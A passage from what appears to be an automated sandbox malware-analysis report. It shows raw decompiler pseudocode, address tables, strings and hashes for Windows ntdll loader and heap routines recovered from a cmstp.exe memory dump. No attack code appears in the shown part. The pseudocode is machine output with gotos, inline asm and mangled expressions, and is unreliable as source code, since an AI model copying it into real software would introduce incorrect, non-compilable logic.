					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E050E934A() != 0) {
								_t159 = E0515A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x51c5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E05155510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x51c5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E050E849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E050E8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E050E8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x51c5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x51c5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E050F2280(_t92, 0x51c86cc);
															_t94 = E051A9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E051061A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x51c5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E050E8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x51c5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x51c5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0511F380(_t136, 0x50b1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E050F2280(_t108, 0x51c86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E051061A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E051A9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E050EFFB0(_t118, _t156, 0x51c86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E05119A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x050e8799
0x050e879d
0x050e87a1
0x050e87a3
0x050e87a8
0x050e87c3
0x050e87c3
0x050e87c8
0x050e87d1
0x050e87d4
0x050e87d8
0x050e87e5
0x050e87ec
0x05139bfe
0x05139c00
0x05139c02
0x05139c08
0x05139c0d
0x05139c0f
0x05139c14
0x05139c2d
0x05139c32
0x05139c37
0x05139c3a
0x05139c3c
0x05139c42
0x05139c42
0x05139c3c
0x05139c02
0x050e87da
0x050e87df
0x050e87e3
0x00000000
0x00000000
0x050e87e3
0x050e87f2
0x00000000
0x050e87fb
0x050e87fd
0x050e87fe
0x050e880e
0x050e880f
0x050e8810
0x050e8814
0x050e881a
0x050e881c
0x050e881f
0x050e8821
0x050e8822
0x050e8824
0x050e8826
0x050e882c
0x050e882e
0x05139c48
0x05139c48
0x050e8834
0x050e8834
0x050e8837
0x00000000
0x00000000
0x050e8837
0x050e882e
0x050e883d
0x050e8840
0x050e8843
0x050e8846
0x050e8849
0x050e884c
0x050e884e
0x050e8850
0x050e8852
0x050e8854
0x050e8857
0x050e88b4
0x050e88b6
0x050e88b6
0x050e8859
0x050e8859
0x050e8859
0x050e8861
0x050e8866
0x050e886a
0x050e893d
0x050e8941
0x00000000
0x050e8947
0x050e8947
0x050e894a
0x050e894c
0x00000000
0x050e8952
0x050e8955
0x050e895a
0x050e895d
0x050e895d
0x050e895f
0x050e8961
0x050e8961
0x050e8968
0x00000000
0x00000000
0x050e896a
0x050e896b
0x050e896e
0x00000000
0x050e8970
0x050e8970
0x050e8970
0x050e8970
0x050e8972
0x050e8972
0x050e8974
0x00000000
0x050e897a
0x050e897a
0x050e897d
0x00000000
0x050e8983
0x05139c65
0x05139c6d
0x05139c72
0x05139c75
0x05139c75
0x05139c82
0x05139c86
0x05139c87
0x05139c88
0x05139c89
0x05139c8c
0x05139c90
0x05139c95
0x05139c97
0x05139ca0
0x05139ca3
0x05139ca9
0x05139ca9
0x00000000
0x05139ca9
0x05139ca3
0x00000000
0x05139c97
0x050e897d
0x00000000
0x050e8974
0x050e8988
0x050e8992
0x050e8996
0x00000000
0x050e8996
0x050e894c
0x00000000
0x050e8870
0x050e887b
0x050e887d
0x050e887f
0x050e8881
0x050e8884
0x050e8884
0x050e8886
0x050e8889
0x050e888c
0x050e888e
0x050e8891
0x050e8891
0x050e8898
0x00000000
0x00000000
0x050e889a
0x050e889b
0x050e889e
0x00000000
0x00000000
0x050e88a0
0x050e88a8
0x050e88b0
0x050e88b2
0x050e88d3
0x050e88d5
0x00000000
0x050e88d7
0x050e88db
0x050e88dc
0x050e88e0
0x050e88e8
0x050e88ee
0x050e88f0
0x050e88f3
0x050e88fc
0x050e8901
0x050e8906
0x050e890c
0x050e890c
0x050e890f
0x050e8916
0x050e8917
0x050e8918
0x050e8919
0x050e891a
0x050e891f
0x050e8921
0x05139c52
0x05139c55
0x05139c5b
0x05139cac
0x05139cc0
0x05139cc0
0x05139c55
0x050e8927
0x050e8927
0x050e892f
0x050e8933
0x00000000
0x050e88f5
0x050e88f5
0x00000000
0x050e88f7
0x050e88f7
0x050e88fa
0x00000000
0x00000000
0x00000000
0x00000000
0x050e88fa
0x050e88f5
0x050e88f3
0x00000000
0x050e88d5
0x00000000
0x050e88b2
0x050e88c9
0x00000000
0x050e88c9
0x050e887f
0x050e886a
0x050e8857
0x050e8852
0x050e88bf
0x050e88bf
0x050e87aa
0x050e87ad
0x050e87ae
0x050e87b4
0x050e87b5
0x050e87b6
0x050e87b8
0x050e87bd
0x050e87c1
0x050e87f4
0x050e87fa
0x00000000
0x00000000
0x00000000
0x050e87c1
0x00000000

Strings

LdrpDoPostSnapWork, xrefs: 05139C1E
minkernel\ntdll\ldrsnap.c, xrefs: 05139C28
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 05139C18

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 0-1948996284
Opcode ID: 1f37605796e4b9b53148652c3870e2a474302c17f4a2faa047c8e89615e7b74e
Instruction ID: 44c005d89b0d767b7511a6f3c7b63394fc1e88ecef281fd5b46ef212b83c45b0
Opcode Fuzzy Hash: 1f37605796e4b9b53148652c3870e2a474302c17f4a2faa047c8e89615e7b74e
Instruction Fuzzy Hash: 11910231B00216AFDB58DF58E981ABEB7F6FF44310F258069ED46AB250DB70E941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0510AC7B Relevance: 4.0, Strings: 3, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0510AC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x8
					E0512D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0x51c8a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1017
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x20
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E051196E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E05183C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E051196E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E050DB150();
							} else {
								E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E050DB150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E051914FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E050F7D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E05191411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E050F7D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E05191411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}

0x0510ac85
0x0510ac88
0x0510ac8a
0x0510ac8d
0x0510ac91
0x0510ac99
0x0510ac9c
0x05149f57
0x05149f5b
0x05149f60
0x05149f60
0x0510aca8
0x0510acae
0x0510acda
0x0510acde
0x0510ace8
0x0510aceb
0x0510acee
0x00000000
0x0510acee
0x0510acf6
0x0510acb0
0x0510acb0
0x0510acbb
0x0510acbd
0x0510acc0
0x0510acc5
0x0510adae
0x0510adb4
0x0510adb4
0x0510acd4
0x0510acd8
0x0510acf9
0x0510acff
0x0510ad04
0x0510ad08
0x0510ad09
0x0510ad10
0x0510ad12
0x0510ad18
0x05149f6f
0x05149f74
0x05149f76
0x05149f7c
0x05149f84
0x05149f88
0x05149f89
0x05149f90
0x05149f90
0x05149f76
0x0510ad1e
0x0510ad24
0x0510ad26
0x0514a097
0x0514a09b
0x0514a0ba
0x0514a0bf
0x0514a09d
0x0514a0b2
0x0514a0b7
0x0514a0c5
0x0514a0c8
0x0514a0cb
0x0514a0d2
0x00000000
0x0510ad2c
0x0510ad2c
0x0510ad2f
0x0510ad34
0x0510ad36
0x05149f97
0x05149f9a
0x00000000
0x00000000
0x05149fa9
0x0510ad3e
0x0510ad3e
0x0510ad41
0x05149fb3
0x05149fb9
0x05149fc0
0x05149fd0
0x05149fd0
0x05149fc0
0x0510ad4a
0x0510ad50
0x0510ad5c
0x0510ad62
0x0510ad68
0x0510ad6b
0x0510ad6d
0x05149fda
0x05149fdd
0x00000000
0x00000000
0x05149fec
0x00000000
0x0510ad73
0x0510ad73
0x0510ad73
0x0510ad75
0x0510ad75
0x0510ad78
0x05149ff6
0x05149ffc
0x0514a003
0x0514a00e
0x0514a010
0x0514a01b
0x0514a01b
0x0514a01b
0x0514a038
0x0514a038
0x0514a003
0x0510ad84
0x0510ad89
0x0510ad8c
0x0510ad8e
0x0514a042
0x0514a045
0x00000000
0x00000000
0x0514a054
0x00000000
0x0510ad94
0x0510ad94
0x0510ad94
0x0510ad96
0x0510ad96
0x0510ad99
0x0514a063
0x0514a065
0x0514a070
0x0514a070
0x0514a070
0x0514a08d
0x0514a08d
0x0510ada4
0x0510ada6
0x00000000
0x0510ada6
0x0510ad8e
0x0510ad6d
0x0510ad3c
0x0510ad3c
0x00000000
0x0510ad3c
0x00000000
0x00000000
0x00000000
0x0510acd8

Strings

RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0514A0CD
HEAP[%wZ]: , xrefs: 0514A0AD
HEAP: , xrefs: 0514A0BA

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: 52bb61b2925a6e0919a9282a82c6938a5f9ec91d92dc6d5285d7ac18cc9ea7fd
Instruction ID: b1428bd21c64dff7d2a2ced8b67c7b6247e49e7abe33985ba7c8f095cb9e7350
Opcode Fuzzy Hash: 52bb61b2925a6e0919a9282a82c6938a5f9ec91d92dc6d5285d7ac18cc9ea7fd
Instruction Fuzzy Hash: D1811335244784EFD726CB68C988FAABBF9FF04310F0945A5E5528B6D2D7B8E941CB10

Uniqueness

Uniqueness Score: -1.00%

Function 050FB73D Relevance: 3.9, Strings: 3, Instructions: 190
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E050FB73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E0519A80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0x51c8748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E050DB150();
					} else {
						E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E050DB150();
					__eflags =  *0x51c7bc8;
					if(__eflags == 0) {
						E05192073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E0519A80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0x51c8720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0x51c8720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E050FB8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E0519A80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E050FE4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}

0x050fb746
0x050fb74b
0x050fb74d
0x050fb750
0x050fb755
0x050fb758
0x050fb758
0x050fb75e
0x050fb763
0x050fb764
0x050fb76a
0x050fb76d
0x050fb771
0x050fb776
0x050fb85c
0x050fb85d
0x050fb860
0x050fb865
0x05142ba1
0x05142ba2
0x05142ba9
0x05142bae
0x05142bae
0x050fb77c
0x050fb77c
0x050fb77c
0x050fb785
0x050fb788
0x05142bb6
0x05142bb9
0x00000000
0x00000000
0x05142bbf
0x05142bc5
0x05142bc9
0x05142be8
0x05142bed
0x05142bcb
0x05142be0
0x05142be5
0x05142bf3
0x05142bf8
0x05142bfd
0x05142c05
0x05142c0e
0x05142c0e
0x00000000
0x050fb78e
0x050fb78e
0x050fb78e
0x050fb791
0x050fb791
0x050fb797
0x050fb797
0x050fb79f
0x050fb7a9
0x050fb7af
0x050fb7af
0x050fb7b1
0x050fb7b6
0x050fb7e2
0x050fb7e2
0x050fb7e7
0x050fb880
0x050fb7ed
0x050fb7ed
0x050fb7ed
0x050fb7ef
0x050fb7f2
0x050fb7f2
0x050fb7f5
0x050fb7fa
0x05142c2d
0x05142c2e
0x05142c39
0x050fb800
0x050fb800
0x050fb802
0x050fb805
0x050fb808
0x050fb808
0x050fb80a
0x050fb80d
0x050fb816
0x050fb81c
0x050fb822
0x050fb82f
0x050fb88b
0x050fb892
0x050fb897
0x050fb899
0x050fb89b
0x050fb89e
0x050fb8a5
0x050fb8a8
0x050fb8aa
0x050fb8ac
0x050fb8ac
0x050fb8aa
0x050fb892
0x050fb831
0x050fb839
0x050fb83b
0x050fb83b
0x050fb844
0x050fb84b
0x050fb852
0x050fb7b8
0x050fb7ba
0x050fb7bf
0x050fb7c4
0x05142c18
0x05142c19
0x05142c23
0x050fb7ca
0x050fb7ca
0x050fb7cc
0x050fb7cf
0x050fb7d1
0x050fb7d1
0x050fb7d4
0x050fb7dc
0x050fb8bb
0x050fb8bb
0x050fb8be
0x050fb8be
0x050fb8c1
0x00000000
0x00000000
0x050fb8c3
0x050fb8c5
0x050fb8c7
0x050fb8e0
0x00000000
0x050fb8e0
0x050fb8cc
0x050fb8cc
0x00000000
0x050fb8cc
0x050fb8d6
0x050fb8d6
0x00000000
0x050fb7dc
0x050fb7b6

Strings

((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 05142BF3
HEAP[%wZ]: , xrefs: 05142BDB
HEAP: , xrefs: 05142BE8

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: bbca88c02224e4edbd2af086c3a3b88283071f0c469afdd2eb731fb09a0ab079
Instruction ID: d03549db6149577c85477b2350cd56cfb300a0f66cf77fb4407d127a5be1e6d3
Opcode Fuzzy Hash: bbca88c02224e4edbd2af086c3a3b88283071f0c469afdd2eb731fb09a0ab079
